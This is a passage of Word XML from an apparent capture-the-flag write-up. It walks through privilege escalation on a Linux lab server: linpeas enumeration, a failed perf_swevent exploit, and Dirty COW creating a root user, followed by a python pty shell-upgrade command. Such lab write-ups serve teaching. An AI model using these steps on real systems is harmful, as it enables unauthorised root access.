      <w:r w:rsidRPr="36B4C1F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">By using </w:t>
      </w:r>
      <w:r w:rsidR="7479746A" w:rsidRPr="73010BB4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00924545">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidR="2D420415" w:rsidRPr="012B0D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="36B4C1F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the home directory we can see which users have a </w:t>
      </w:r>
      <w:r w:rsidRPr="61616D34">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>home directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7131B64F" w14:textId="4C23CA25" w:rsidR="42F6BC77" w:rsidRDefault="42F6BC77" w:rsidP="42F6BC77">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C822293" w14:textId="42C2E4AE" w:rsidR="51918FEA" w:rsidRDefault="51918FEA" w:rsidP="42F6BC77">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="446A4F5E" wp14:editId="4A054AF5">
            <wp:extent cx="3886200" cy="581025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2021521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1374" name="Picture 202152137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1668" w14:textId="5F863B61" w:rsidR="578C44EC" w:rsidRDefault="578C44EC" w:rsidP="578C44EC"/>
    <w:p w14:paraId="4FF597DA" w14:textId="77777777" w:rsidR="004C260C" w:rsidRPr="00F71CAB" w:rsidRDefault="4B444F3B" w:rsidP="00C6772B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc38823864"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>Flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="3806FF2A" w14:textId="77777777" w:rsidR="00641053" w:rsidRPr="00F71CAB" w:rsidRDefault="00641053" w:rsidP="00641053"/>
    <w:p w14:paraId="62DF8F90" w14:textId="68A83E0D" w:rsidR="00641053" w:rsidRPr="00222E5C" w:rsidRDefault="33CD0550" w:rsidP="00641053">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="4559BD73">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>By doing some more searching we can see that the user “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="4559BD73">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>boes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="4559BD73">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">” has a file in his home directory which </w:t>
      </w:r>
      <w:r w:rsidRPr="4612E890">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contains the flag</w:t>
      </w:r>
      <w:r w:rsidRPr="7360711C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC5BA85" w14:textId="4ED199A4" w:rsidR="7360711C" w:rsidRDefault="7360711C" w:rsidP="7360711C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="436C8BE3" w14:textId="31AB6C77" w:rsidR="7360711C" w:rsidRDefault="33CD0550" w:rsidP="7360711C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11930AD0" wp14:editId="37F7E333">
            <wp:extent cx="5076825" cy="1943100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1090415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5681" name="Picture 10904156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08C1" w14:textId="47A7B306" w:rsidR="004C260C" w:rsidRPr="00F71CAB" w:rsidRDefault="00702786" w:rsidP="14E4BB49">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="73701716" w14:textId="3A952816" w:rsidR="412C73FB" w:rsidRDefault="4B444F3B" w:rsidP="02B53F96">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc1173891180"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Privilege escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="47F822CF" w14:textId="3C6C54F2" w:rsidR="00641053" w:rsidRPr="00F71CAB" w:rsidRDefault="4B444F3B" w:rsidP="1446704B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc249656563"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>Kernel version</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="410F34C4" w14:textId="3FD02012" w:rsidR="00415399" w:rsidRPr="0026527D" w:rsidRDefault="6A07711F" w:rsidP="5C37A370">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="54A69809">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>By using the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4202D">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="54A69809">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>” command we can see the kernel version:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4475B6F3" w14:textId="6BCDAE37" w:rsidR="41FFB469" w:rsidRDefault="41FFB469" w:rsidP="41FFB469">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BCF7D17" w14:textId="6B244768" w:rsidR="6A07711F" w:rsidRDefault="6A07711F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59C16888" wp14:editId="15CD915F">
            <wp:extent cx="3886200" cy="600075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="238566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6098" name="Picture 23856609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458C" w14:textId="6502B54A" w:rsidR="02B18E00" w:rsidRDefault="02B18E00"/>
    <w:p w14:paraId="1ADD33EF" w14:textId="31D67276" w:rsidR="425B64D8" w:rsidRDefault="425B64D8" w:rsidP="24730F8F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc1949146911"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>Flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="7EE914A9" w14:textId="3F07AFE7" w:rsidR="0AE058D5" w:rsidRDefault="0AE058D5" w:rsidP="24730F8F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To try and find what the server is vulnerable to, we </w:t>
      </w:r>
      <w:r w:rsidR="6E8FDB35" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">first use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="6E8FDB35" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linpeas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="6E8FDB35" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> script. To get it on the </w:t>
      </w:r>
      <w:r w:rsidR="6F379FBC" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>server,</w:t>
      </w:r>
      <w:r w:rsidR="6E8FDB35" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we download it and start a python server on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="6E8FDB35" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attackbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0AF020EB" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. After</w:t>
      </w:r>
      <w:r w:rsidR="6E8FDB35" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="73AB0DD5" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>this,</w:t>
      </w:r>
      <w:r w:rsidR="6E8FDB35" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we </w:t>
      </w:r>
      <w:r w:rsidR="3F414DA2" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can download the file on the server in the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="3F414DA2" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="3F414DA2" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory</w:t>
      </w:r>
      <w:r w:rsidR="14857EDE" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. By running this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="14857EDE" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="14857EDE" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we get some promising results that we can try, one of these is the </w:t>
      </w:r>
      <w:r w:rsidR="73622C9B" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ready to use exploit for perf(_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="73622C9B" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>swevent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="73622C9B" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="42092EAF" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="73622C9B" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5E5C6170" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="73622C9B" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">e use the same strategy as before to get it on the server, compile it using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="73622C9B" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="73622C9B" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and try to run it</w:t>
      </w:r>
      <w:r w:rsidR="4C4C67B6" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C0F2D2" w14:textId="22792D50" w:rsidR="24730F8F" w:rsidRDefault="24730F8F" w:rsidP="24730F8F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="786C6054" w14:textId="5D3B8077" w:rsidR="4C4C67B6" w:rsidRDefault="4C4C67B6" w:rsidP="24730F8F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64EA9931" wp14:editId="0AEADC02">
            <wp:extent cx="5724525" cy="2457450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="251013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512" name="Picture 1610625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0FCE" w14:textId="77777777" w:rsidR="007265A9" w:rsidRDefault="007265A9" w:rsidP="24730F8F"/>
    <w:p w14:paraId="53063168" w14:textId="1B830F41" w:rsidR="634C4CA2" w:rsidRPr="007F5667" w:rsidRDefault="634C4CA2" w:rsidP="24730F8F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5667">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This end</w:t>
      </w:r>
      <w:r w:rsidR="32791D6B" w:rsidRPr="007F5667">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5667">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> up not working but we continued </w:t>
      </w:r>
      <w:r w:rsidR="007265A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>searching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C30EC25" w14:textId="145B6C93" w:rsidR="24730F8F" w:rsidRPr="007F5667" w:rsidRDefault="24730F8F" w:rsidP="24730F8F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42D6FA01" w14:textId="22058868" w:rsidR="46E07FDA" w:rsidRPr="00A5185E" w:rsidRDefault="34439713" w:rsidP="46E07FDA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">After some </w:t>
      </w:r>
      <w:r w:rsidR="30D549E5" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">more </w:t>
      </w:r>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">research we find that the 3.2.0-23-generic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> kernel is highly vulnerable to the dirty cow exploit: this will all</w:t>
      </w:r>
      <w:r w:rsidR="058B1128" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ow us to create a new root user. First</w:t>
      </w:r>
      <w:r w:rsidR="48FD26E8" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="058B1128" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we need </w:t>
      </w:r>
      <w:r w:rsidR="084BFECA" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the C file for this exploit, we download it</w:t>
      </w:r>
      <w:r w:rsidR="7AACA5EB" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="084BFECA" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7AACA5EB" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>compile it</w:t>
      </w:r>
      <w:r w:rsidR="084BFECA" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and start a python server on ou</w:t>
      </w:r>
      <w:r w:rsidR="1F8DBF87" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="084BFECA" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="084BFECA" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attackbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="084BFECA" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, after this we can download the file on the server in the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="084BFECA" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="084BFECA" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE605D9" w14:textId="76477E1B" w:rsidR="32AF28E7" w:rsidRDefault="32AF28E7" w:rsidP="32AF28E7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="061910D5" w14:textId="7AA4B74E" w:rsidR="32AF28E7" w:rsidRDefault="7DBAF12F" w:rsidP="32AF28E7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="646542E3" wp14:editId="2CD81E39">
            <wp:extent cx="5724525" cy="1323975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="659660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0271" name="Picture 65966027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F821" w14:textId="1BDD7D10" w:rsidR="276A9BEE" w:rsidRDefault="41CD88AD" w:rsidP="276A9BEE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="672EC3C9" wp14:editId="5C995219">
            <wp:extent cx="3481899" cy="3904145"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1988513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3235" name="Picture 198851323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899" cy="39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B1BE" w14:textId="6C864DFE" w:rsidR="24730F8F" w:rsidRDefault="24730F8F"/>
    <w:p w14:paraId="7A38340F" w14:textId="494C217B" w:rsidR="164457C0" w:rsidRPr="005343A9" w:rsidRDefault="0900818F" w:rsidP="24730F8F">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we have the </w:t>
      </w:r>
      <w:r w:rsidR="4DA5FA74" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">compiled </w:t>
      </w:r>
      <w:r w:rsidR="48AFA30B" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> file on the </w:t>
      </w:r>
      <w:r w:rsidR="2944BD16" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>server,</w:t>
      </w:r>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we </w:t>
      </w:r>
      <w:r w:rsidR="334AF74E" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>make it executable by using “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="334AF74E" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="334AF74E" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> +x</w:t>
      </w:r>
      <w:r w:rsidR="334AF74E" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="37A38526" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then we can run it, it will ask us for a password for the new user, we chose “exploit”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1603524A" w14:textId="5DC0E3CD" w:rsidR="7020810D" w:rsidRDefault="7020810D" w:rsidP="7020810D">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C6A4CA5" w14:textId="1563EFB7" w:rsidR="2CD292BD" w:rsidRDefault="0224BEA2" w:rsidP="2CD292BD">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17ECE698" wp14:editId="591B1D49">
            <wp:extent cx="5724525" cy="3952875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="684081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1470" name="Picture 68408147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D833" w14:textId="424405D1" w:rsidR="00415399" w:rsidRPr="00B82FC0" w:rsidRDefault="0224BEA2" w:rsidP="5C37A370">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="6443692D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">When we try </w:t>
      </w:r>
      <w:r w:rsidRPr="364F5C9D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to log in as </w:t>
      </w:r>
      <w:r w:rsidRPr="35085D09">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>our newly created user “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="35085D09">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>firefart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="35085D09">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="47705337">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we get </w:t>
      </w:r>
      <w:r w:rsidRPr="6206D5CB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">an error, we </w:t>
      </w:r>
      <w:r w:rsidRPr="551619B2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">need to make </w:t>
      </w:r>
      <w:r w:rsidRPr="25A6FD46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">our terminal </w:t>
      </w:r>
      <w:r w:rsidRPr="6A0A0F37">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interactive</w:t>
      </w:r>
      <w:r w:rsidRPr="74F2B97C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, we do this </w:t>
      </w:r>
      <w:r w:rsidRPr="06BF9DFA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">by using </w:t>
      </w:r>
      <w:r w:rsidRPr="438F61D7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C734C2C" w14:textId="4A84CC6B" w:rsidR="61D1AEC4" w:rsidRPr="00D4202D" w:rsidRDefault="74FDC7E2" w:rsidP="61D1AEC4">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4202D">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">python -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4202D">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4202D">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4202D">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4202D">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>("/bin/bash")'</w:t>
      </w:r>
    </w:p>
